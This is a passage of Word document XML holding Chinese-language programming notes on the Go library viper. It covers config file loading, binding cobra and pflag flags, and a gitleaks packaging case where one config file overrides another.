          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.SetConfigName("config") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F1186F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.SetConfigType("toml") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56434672" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.AddConfigPath(".") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2615F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">err := viper.ReadInConfig() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E712D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">if err != nil { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219881F9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">log.Fatal("read config failed: %v", err) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEF0E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C46F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">var c Config </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AAB651" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">viper.Unmarshal(&amp;c) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20F355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt.Println(c.MySQL) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23B64F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715B18B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3648E7DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F3858A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A56D5D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4055DF90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="396E5DF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A17D7F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC44B7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>serverCmd.Flags().Int("port", 1138, "Port to run Application server on")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890B575" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>viper.BindPFlag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>("port", serverCmd.Flags().Lookup("port"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E0213" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF27211" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pflag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0E9D83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BD924A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA209B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pflag.Int("flagname", 1234, "help message for flagname")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B4303" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D26B76A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pflag.Parse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71571181" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>viper.BindPFlags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(pflag.CommandLine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34478451" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36ABD40B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i := viper.GetInt("flagname") // retrieve values from viper instead of pflag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F281CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6ADDE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CFE2ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241692E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">init() { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226CBD57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pflag.Int("redis.port", 8381, "Redis port to connect") // </w:t>
      </w:r>
      <w:r>
        <w:t>绑定命令行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A86BDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">viper.BindPFlags(pflag.CommandLine) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E7259" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB5863E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EBBE10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例：同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>viper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个配置文件，后者覆盖前者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E70E81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此次案例参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://treexie.gitbook.io/articles/viper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55244886" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFF1877" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>背景</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求打包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>toml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的默认配置文件嵌套进去，然后该默认的配置文件我们可控，且支持用户对其中某个单条的配置规则的修改或者添加。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A7AA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1F2D76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接中示例如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1FB978" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func initConfig() (err error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B13E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    configType := "yml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD645B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    defaultPath := "./configs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293CCF40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    v := viper.New()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7A152" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中读取默认的配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D247CCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    v.SetConfigName("default")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD50FF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    v.AddConfigPath(defaultPath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2D08C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    v.SetConfigType(configType)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9765E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    err = v.ReadInConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CF6A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE62AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C0E58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EFFBD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B85D139" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    configs := v.AllSettings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B85032" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的配置全部以默认配置写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E97BDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>for k, v := range configs {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C417DC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        viper.SetDefault(k, v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47828FAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    } // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>在这里使用到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>viper.Set</w:t>
      </w:r>
      <w:r>
